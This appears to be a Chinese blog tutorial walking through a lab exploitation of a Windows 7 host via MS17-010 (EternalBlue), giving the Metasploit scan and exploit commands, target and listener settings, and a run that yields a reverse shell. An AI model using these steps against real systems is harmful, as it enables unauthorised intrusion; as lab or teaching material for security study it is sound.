攻击机：192.168.148.132  kali linux2018.2  x64

靶机：192.168.1.129    win7   x64

首先用msfconsole的smb模块扫描，看看是否有漏洞

use auxiliary/scanner/smb/smb_ms17_010

set rhosts 192.168.1.129 （目标主机）

Host is likely VULNERABLE to MS17-010! - Windows 7 Professiona

表示这个主机存在这个漏洞

1 search  ms17_010 搜索这个漏洞

2   use exploit/windows/smb/ms17_010_eternalblue

利用这个漏洞

3 show options

msf exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.1.129  目标主机

rhost => 192.168.1.129

msf exploit(windows/smb/ms17_010_eternalblue) > set lhost 192.168.1.132 攻击者主机

lhost => 192.168.1.132

msf exploit(windows/smb/ms17_010_eternalblue) > set lport 8888 监听端口 （这个可以随意，但要大于2000，个人认为）

run  开始攻击 这个表示拿shell成功了

最新文章

1. 【dubbo】zookeeper搭建
2. Linux下NDK编译FFMPEG包含neon参数
3. github打不开
4. 使用 PSD Validator 在线校验 PSD 文件的质量
5. vs2012中怎样设为起始页，怎样取消
6. 微信开发(03)之新建按钮时报错 errcode 40054
7. PHP获得两个绝对路径的相对路径
8. 【转】WF事件驱动
9. spring mvc json 返回乱码问题解决(vestion:3.x.x)
10. MAC安裝《Genymotion Android模擬器》大玩Android APP (神魔之塔)
11. UVa 10176 - Ocean Deep ! - Make it shallow !!
12. requireJS基础使用
13. 【题解】Luogu P3217 [HNOI2011]数矩形
14. SCU 4439 Vertex Cover（二分图最小覆盖点）题解
15. HanLP极致简繁转换详细讲解
16. Fiddler 手机无法上网问题
17. nginx+lvs+keepalived安装
18. ssm框架中的乱码问题的解决
19. Flask学习目录
20. 去掉input框后边的叉号

热门文章

1. 关于 mysql2 -v '0.3.21'（CentOS7.3）
2. Hadoop 安全模式safemode
3. 多个for循环嵌套会影响速度
4. 在java中实现数据导入excel表格中
5. Mysql查询创建和导入操作
6. 58 字体反爬攻略 python3
7. ltp-ddt nor qspi spi调试中需要修改的地方
8. Prometheus监控学习笔记之Prometheus 2.0 告警规则介绍
9. Ubuntu 无界面使用selenium chrome + headless
10. linux编译链接找不到库文件的解决方法。